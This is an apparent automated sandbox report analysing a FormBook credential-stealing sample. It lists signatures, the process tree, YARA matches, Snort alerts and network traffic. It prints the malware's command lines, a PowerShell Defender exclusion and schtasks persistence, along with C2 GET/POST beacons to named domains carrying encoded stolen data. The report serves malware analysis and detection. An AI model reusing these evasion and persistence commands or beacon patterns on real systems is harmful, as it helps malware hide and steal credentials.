
Windows Analysis Report
JeouiaPf03mHSBH.exe

Overview

General Information

Sample name: JeouiaPf03mHSBH.exe
Analysis ID: 1481954
MD5: 7a591f965d4de7439413d7630026d9be
SHA1: de97ba629873de027142e506f3862d1d6debc30d
SHA256: 6a56cbb193f28d62f0fa7f1ecbd0835e95e1aec40e2c08d9b2f839a0c4d76fab
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • JeouiaPf03mHSBH.exe (PID: 7080 cmdline: "C:\Users\user\Desktop\JeouiaPf03mHSBH.exe" MD5: 7A591F965D4DE7439413D7630026D9BE)
    • powershell.exe (PID: 3264 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7316 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6316 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7228 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • qRurKwDVhn.exe (PID: 5224 cmdline: "C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SearchIndexer.exe (PID: 7740 cmdline: "C:\Windows\SysWOW64\SearchIndexer.exe" MD5: CF7BEFBA5E20F2F4C7851D016067B89C)
          • qRurKwDVhn.exe (PID: 5064 cmdline: "C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8112 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • snTlRrBza.exe (PID: 7260 cmdline: C:\Users\user\AppData\Roaming\snTlRrBza.exe MD5: 7A591F965D4DE7439413D7630026D9BE)
    • schtasks.exe (PID: 7476 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpCEDB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7528 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7548 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • qRurKwDVhn.exe (PID: 5288 cmdline: "C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SearchIndexer.exe (PID: 7916 cmdline: "C:\Windows\SysWOW64\SearchIndexer.exe" MD5: CF7BEFBA5E20F2F4C7851D016067B89C)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source, Rule, Description, Author, Strings):

Source: 00000011.00000002.2925725443.0000000002E70000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
    • 0x2b7a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1429f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000011.00000002.2925650588.0000000002E20000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
    • 0x2b7a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1429f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000006.00000002.2095784893.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
(19 entries in total; the remaining entries are not shown here)

Yara matches in unpacked PE files (Source, Rule, Description, Author, Strings):

Source: 6.2.RegSvcs.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
    • 0x2dd93:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16892:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
    • 0x2eb93:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17692:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JeouiaPf03mHSBH.exe", ParentImage: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe, ParentProcessId: 7080, ParentProcessName: JeouiaPf03mHSBH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe", ProcessId: 3264, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpCEDB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpCEDB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\snTlRrBza.exe, ParentImage: C:\Users\user\AppData\Roaming\snTlRrBza.exe, ParentProcessId: 7260, ParentProcessName: snTlRrBza.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpCEDB.tmp", ProcessId: 7476, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\JeouiaPf03mHSBH.exe", ParentImage: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe, ParentProcessId: 7080, ParentProcessName: JeouiaPf03mHSBH.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp", ProcessId: 6316, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JeouiaPf03mHSBH.exe", ParentImage: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe, ParentProcessId: 7080, ParentProcessName: JeouiaPf03mHSBH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe", ProcessId: 3264, ProcessName: powershell.exe

            Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\JeouiaPf03mHSBH.exe", ParentImage: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe, ParentProcessId: 7080, ParentProcessName: JeouiaPf03mHSBH.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp", ProcessId: 6316, ProcessName: schtasks.exe
No Snort rule has matched

Timestamp: 2024-07-25T16:34:04.512340+0200
SID: 2050745
Source Port: 49748
Destination Port: 80
Protocol: TCP
Classtype: Malware Command and Control Activity Detected

Timestamp: 2024-07-25T16:32:39.081573+0200
SID: 2022930
Source Port: 443
Destination Port: 49737
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-07-25T16:33:35.208840+0200
SID: 2050745
Source Port: 49744
Destination Port: 80
Protocol: TCP
Classtype: Malware Command and Control Activity Detected

Timestamp: 2024-07-25T16:34:18.863880+0200
SID: 2050745
Source Port: 49752
Destination Port: 80
Protocol: TCP
Classtype: Malware Command and Control Activity Detected

Timestamp: 2024-07-25T16:33:17.571339+0200
SID: 2022930
Source Port: 443
Destination Port: 49743
Protocol: TCP
Classtype: A Network Trojan was detected


            AV Detection

Source: Yara match; File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000011.00000002.2925725443.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.2925650588.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2095784893.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.2925371648.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2097970125.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.2448787756.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.2923647911.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.2925569784.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2098515296.00000000023F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.2345762971.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.2925655670.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe; Joe Sandbox ML: detected
Source: JeouiaPf03mHSBH.exe; Joe Sandbox ML: detected
Source: JeouiaPf03mHSBH.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: JeouiaPf03mHSBH.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: SearchIndexer.pdb source: qRurKwDVhn.exe, 00000010.00000003.2034241645.0000000004673000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000003.2034639712.000000000473C000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2269804952.0000000000BDD000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2270146461.0000000002512000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: RAwd.pdb source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qRurKwDVhn.exe, 00000010.00000002.2923610433.00000000001EE000.00000002.00000001.01000000.0000000E.sdmp, qRurKwDVhn.exe, 00000012.00000000.2253128743.00000000001EE000.00000002.00000001.01000000.0000000E.sdmp, qRurKwDVhn.exe, 00000014.00000002.2923654418.00000000001EE000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: RAwd.pdbSHA256y source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.dr
            Source: Binary string: RegSvcs.pdb, source: SearchIndexer.exe, 00000011.00000002.2927079100.00000000036BC000.00000004.10000000.00040000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2924136902.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000014.00000000.2299855317.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2623311348.000000002E7BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.2096368069.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.000000000322E000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2105365281.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.0000000003090000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2096508164.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2342536964.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.0000000003610000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2351477186.000000000346A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000006.00000002.2096368069.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.000000000322E000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2105365281.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.0000000003090000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2096508164.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2342536964.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.0000000003610000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2351477186.000000000346A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: SearchIndexer.pdbUGP source: qRurKwDVhn.exe, 00000010.00000003.2034241645.0000000004673000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000003.2034639712.000000000473C000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2269804952.0000000000BDD000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2270146461.0000000002512000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: RegSvcs.pdb source: SearchIndexer.exe, 00000011.00000002.2927079100.00000000036BC000.00000004.10000000.00040000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2924136902.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000014.00000000.2299855317.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2623311348.000000002E7BC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe; Code function: 4x nop then lea ecx, dword ptr [ebp-38h] (0_2_063C4551)
Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe; Code function: 4x nop then jmp 063C4C06h (0_2_063C4B7E)
Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe; Code function: 4x nop then jmp 08129746h (0_2_08129864)
Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe; Code function: 4x nop then lea ecx, dword ptr [ebp-38h] (7_2_06414551)
Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe; Code function: 4x nop then jmp 06414C06h (7_2_06414B7E)
Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe; Code function: 4x nop then jmp 07BB89E6h (7_2_07BB8B04)
Source: Joe Sandbox View; IP Address: 162.159.134.42
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected:
  GET /a337/?Srs=SuUCFGYLxfLSdB28yljyaXWxuxRxJPFERXqB8u1oV3tm3kjCrY/pbRNQPdsTXJeAd6y0uqoRophDcIlFpB6vZX+ChFce/OnhDgpWLzbAV64NbxtnxH/0gwE=&FX=9v8XFZ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.max500.buzz
  Connection: close
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic; HTTP traffic detected:
  GET /w4k2/?FX=9v8XFZ&Srs=2mUcXvumjW0wgt1YpxGgI9tplSZcgAOBemrxBZvBawhLbtumtBi2Jym3H1IAKOuUn8QM7qLvtyDV0vTia9jGf+aRu2Xe28jNlZEC87Er+mbo2ND9VTXv/fQ= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.ancuapengiu28.com
  Connection: close
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic; HTTP traffic detected:
  GET /rk1u/?Srs=F12hDm1e4DcVWImHJ+2qK+It/RbJLRPuehC1dypgSVIG0HNIZQ44LV2EHRnZDsdrBZ/sqOYHya/GlclbNDRcdimcV6EHMYCTSyL+JOmQWa2hH4hFNXMeP+g=&FX=9v8XFZ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.goodneighbor.club
  Connection: close
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic; DNS traffic detected: DNS query: www.sabhevillage.online
Source: global traffic; DNS traffic detected: DNS query: www.max500.buzz
Source: global traffic; DNS traffic detected: DNS query: www.ancuapengiu28.com
Source: global traffic; DNS traffic detected: DNS query: www.goodneighbor.club
Source: global traffic; DNS traffic detected: DNS query: www.lomos.top
            Source: unknownHTTP traffic detected: POST /w4k2/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.ancuapengiu28.comCache-Control: max-age=0Content-Length: 200Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.ancuapengiu28.comReferer: http://www.ancuapengiu28.com/w4k2/User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Data Raw: 53 72 73 3d 37 6b 38 38 55 61 6e 71 32 6d 4d 58 72 71 35 45 75 79 47 54 57 36 51 5a 76 46 77 54 33 68 44 52 53 68 44 53 47 35 66 6e 4b 51 56 50 53 65 69 6f 6a 42 6a 32 4c 68 50 76 5a 54 77 62 4b 66 62 39 72 4d 63 7a 30 49 7a 4a 74 67 48 4e 38 38 53 79 48 4e 75 75 56 76 72 49 76 6e 50 69 7a 38 6d 31 76 39 45 77 35 36 51 69 70 54 76 6a 69 64 48 70 53 69 58 39 6b 73 35 54 78 44 58 41 73 52 6b 42 6a 51 47 4b 67 79 70 44 4b 6f 79 51 4a 55 61 31 4c 33 2f 35 74 43 42 35 30 66 38 34 31 70 71 61 50 56 30 6d 37 4e 72 53 6d 41 30 4c 39 57 31 48 66 33 37 41 6b 54 61 6f 47 53 5a 48 4a 61 54 4c 48 51 3d 3d Data Ascii: Srs=7k88Uanq2mMXrq5EuyGTW6QZvFwT3hDRShDSG5fnKQVPSeiojBj2LhPvZTwbKfb9rMcz0IzJtgHN88SyHNuuVvrIvnPiz8m1v9Ew56QipTvjidHpSiX9ks5TxDXAsRkBjQGKgypDKoyQJUa1L3/5tCB50f841pqaPV0m7NrSmA0L9W1Hf37AkTaoGSZHJaTLHQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 14:33:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ywN6Klh2QZISVdPV%2FP0Kvhcx%2FM%2BEnWHvEgjrqN9RVOR4iVtoEXsr%2F4k%2F5AabKo43QWOeG7WuksXSkx8JOJ5OxO8z%2BI4E1l7IuiW0exOKpunvnNCf84lswdjQPBkmPr%2FG3c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a8cdda5e9e30f98-EWRalt-svc: h3=":443"; ma=86400Data Raw: 33 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 
20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b Data Ascii: 31c<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%;
            Source: global traffic | HTTP traffic detected (the same 796-byte LiteSpeed response was recorded five times, with date: Thu, 25 Jul 2024 14:33:56 GMT, 14:33:59 GMT, 14:33:59 GMT, 14:34:01 GMT and 14:34:04 GMT; headers and body are identical across all five and shown once):
